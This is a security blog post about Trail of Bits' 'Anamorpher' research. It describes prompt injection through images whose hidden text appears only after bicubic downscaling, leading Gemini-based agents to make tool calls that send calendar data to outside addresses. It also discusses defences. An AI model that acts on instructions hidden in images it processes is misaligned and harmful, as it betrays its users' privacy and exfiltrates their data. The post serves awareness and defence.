---
title: Anamorpher: How LLMs Are Compromised With An Image
description: Trail of Bits just gave us one uncomfortable answer: the future of prompt injection is multimodal, and our models are already listening to whispers we...
url: https://ziosec.com/blog/anamorpher--how-llms-are-compromised-with-an-image
category: Feed
publishedAt: 2025-09-03
author: ZioAI
authorRole: Research
tags: AI Security
---

Last week, researchers at Trail of Bits pulled back the curtain on a sneaky new trick: hiding malicious instructions inside perfectly innocent-looking images. To the human eye, its just another JPEG. To an LLM? Its a covert order to exfiltrate your calendar, forward your emails, etc. They’ve already shown it works against Gemini CLI, Vertex AI Studio, Google Assistant, and Geminis web interface. In one proof-of-concept, Google Calendar data was siphoned off to an external email address.

How the Trick Works

Think of it like steganography with a PhD in human psychology. The attacker uploads an image that looks harmless. But when the AI resizes the file—because of course it resizes the file—mathematical quirks of interpolation reveal hidden text.

Bicubic interpolation: The downscaling method of choice for many platforms, and also the attack vector. Dark patches shift just enough to make black text appear.

Invisible until resized: To the human user, the image looks boring. Once the AI processes it, though, it reads the ghost-text as if you typed it yourself.

Prompt piggybacking: The poisoned instructions slipstream alongside your legitimate prompt. You ask for help scheduling a meeting, and suddenly the AI is sending your private data off-site.

Trail of Bits even released Anamorpher, an open-source tool to generate these cursed images. Consider it both a warning shot and a playbook for anyone less altruistic.

Why Offensive Security Should Pay Attention

This isn’t just another esoteric CVE to throw on a slide deck. This cuts to the heart of trust in multimodal AI systems:

Attack surface expansion: We’ve been focused on text-based prompt injections. Images, audio, video—each new input mode is a door. This research shows those doors aren’t locked.

Workflow infiltration: Many enterprises have wired LLMs directly into calendars, CRMs, ticketing systems, and Slack bots. If one poisoned image can trigger unintended tool calls, attackers don’t need zero-days—they just need Photoshop.

Invisible persistence: Unlike traditional malware, this leaves no files, no processes, no alerts. The “exploit” is hidden in the pixels, and the AI willingly executes it.

In offensive security terms, this is living off the land 2.0. Instead of abusing PowerShell, attackers are abusing bicubic downscaling.

Defensive Daydreams and Reality Checks

Trail of Bits suggests previewing downscaled results, restricting input dimensions, and adding explicit confirmations for sensitive actions. All good hygiene, but lets be honest: enterprise users won’t tolerate constant “Are you sure?” prompts, and vendors want frictionless UX.

Traditional defenses—firewalls, IDS, endpoint agents—won’t even see this coming. Its not malware in the OS, its malware in the conversation.

That leaves two realistic plays:

Secure design patterns: Don’t let AI tools execute commands or call APIs without hardened guardrails.

Layered defenses: Assume multimodal inputs can be hostile, and sanitize them like you would any untrusted payload.

The real message here isn’t “watch out for sneaky JPEGs.” Its that offensive AI security has entered its steganography phase—where attacks hide in the fuzz and artifacts of data we assumed was safe.

And once adversaries realize they can slip malware into cat memes, the trust fabric of AI-assisted work could fray fast.

Final Thought

Security has always been about asking the paranoid “what if” questions. What if an image isn’t just an image? What if every pixel hides a prompt?

Trail of Bits just gave us one uncomfortable answer: the future of prompt injection is multimodal, and our models are already listening to whispers we can’t see.

Welcome to the age of pixel poison.